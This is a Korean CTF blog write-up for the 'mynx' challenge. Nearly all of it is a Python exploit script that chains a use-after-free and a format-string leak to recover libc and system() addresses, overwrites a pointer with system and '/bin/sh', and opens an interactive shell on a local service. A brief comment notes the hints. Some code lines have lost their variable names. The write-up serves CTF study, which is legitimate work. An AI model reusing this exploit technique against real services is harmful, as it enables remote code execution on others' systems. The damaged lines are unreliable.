본문 바로가기
CTF/Problems

mynx writeup

314ckC47_Hacker 2016. 7. 18. 02:01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#!/usr/bin/python
 
from socket import *
from struct import *
from time   import *
 
= lambda x : pack("<L",x)
 
printf_addr = 0x08048420
fmt        = "%11$08x"
 
libc = 0
 
__libc_main_addr = 0
__libc_main_offset = 0x19990
 
system_addr = 0
system_offset = 0x40190
 
def cus_send(s,b):
    s.send(b)
    sleep(0.3)
    s.recv(1024)
 
def cus_send_sh(s,b):
    s.send(b)
    sleep(0.3)
    print s.recv(1024)
 
= socket(AF_INET,SOCK_STREAM)
 
#LIBC LEAK START
print "[*] libc leak start"
s.connect(('localhost',49494))    
 
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
 
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
cus_send(s,"0\n")
 
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
 
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
cus_send(s,"0\n")
 
cus_send(s,"3\n")
cus_send(s,"2\n")
cus_send(s,"1\n")
cus_send(s,p(printf_addr)+fmt+"\n")
cus_send(s,"0\n")
 
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"2\n")
 
cus_send(s,"1\n")
cus_send(s,"A"*251+"\x37"+"\n")
 
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"A"*251+"\x49"+"\n")
 
cus_send(s,"3\n")
cus_send(s,"2\n")
s.send("3\n")
__libc_main_addr = int(s.recv(1024)[:8],16)-243
libc = __libc_main_addr - __libc_main_offset
system_addr = libc + system_offset
 
print "[+] __libc_main leaked :",hex(__libc_main_addr)
print "[*] libc               :",hex(libc)
print "[*] system             :",hex(system_addr)
 
cus_send(s,"0\n")
 
print "[*] Start Exploit"
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
 
cus_send(s,"3\n")
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
cus_send(s,"0\n")
 
cus_send(s,"1\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
 
cus_send(s,"3\n")
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"DUMM\n")
cus_send(s,"0\n")
 
cus_send(s,"3\n")
cus_send(s,"4\n")
cus_send(s,"1\n")
cus_send(s,p(system_addr)+"/bin/sh"+"\n")
cus_send(s,"0\n")
 
cus_send(s,"3\n")
cus_send(s,"3\n")
cus_send(s,"2\n")
 
cus_send(s,"1\n")
cus_send(s,"A"*251+"\x37"+"\n")
 
cus_send(s,"3\n")
cus_send(s,"3\n")
cus_send(s,"1\n")
cus_send(s,"A"*251+"\x49"+"\n")
 
cus_send(s,"3\n")
cus_send(s,"4\n")
s.send("3\n")
 
print "[+] Shell Drop!"
 
while 1:
    cus_send_sh(s,raw_input(">>> ")+"\n")
 
s.close()
cs



mynx 이거 은근히 재미있는 문제입니다... 따봉!

힌트는 Use-After-Free / Format String Bug

이 문제는 진짜 릭 하는걸 printf로 유도하는게 참신 했던 문제 ㅡㅅㅡ...






my


저작자표시 비영리 변경금지

'CTF > Problems' 카테고리의 다른 글

[문서] Return to syscall + H3X0R CTF libsteak write up  (1) 2018.06.16
0ctf 2017 babyheap  (0) 2018.01.18
cookbook  (0) 2016.11.13
kappa write up  (0) 2016.07.21

'CTF/Problems' Related Articles

티스토리툴바